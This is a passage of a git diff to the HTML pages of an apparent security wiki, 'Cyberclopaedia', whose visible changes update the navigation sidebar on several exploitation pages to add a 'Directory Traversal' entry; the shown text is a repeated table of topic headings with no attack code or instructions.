      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Exploitation/DNS/DNS Traffic Amplification.html b/docs/Exploitation/DNS/DNS Traffic Amplification.html index 75e153de..f08e795f 100644 --- a/docs/Exploitation/DNS/DNS Traffic Amplification.html +++ b/docs/Exploitation/DNS/DNS Traffic Amplification.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

Exe - - diff --git a/docs/Exploitation/DNS/index.html b/docs/Exploitation/DNS/index.html index 459ec8cc..37e999c9 100644 --- a/docs/Exploitation/DNS/index.html +++ b/docs/Exploitation/DNS/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

DNS

- - diff --git a/docs/Exploitation/Web/CRLF Injection.html b/docs/Exploitation/Web/CRLF Injection.html index b23f4207..f46ee9e2 100644 --- a/docs/Exploitation/Web/CRLF Injection.html +++ b/docs/Exploitation/Web/CRLF Injection.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
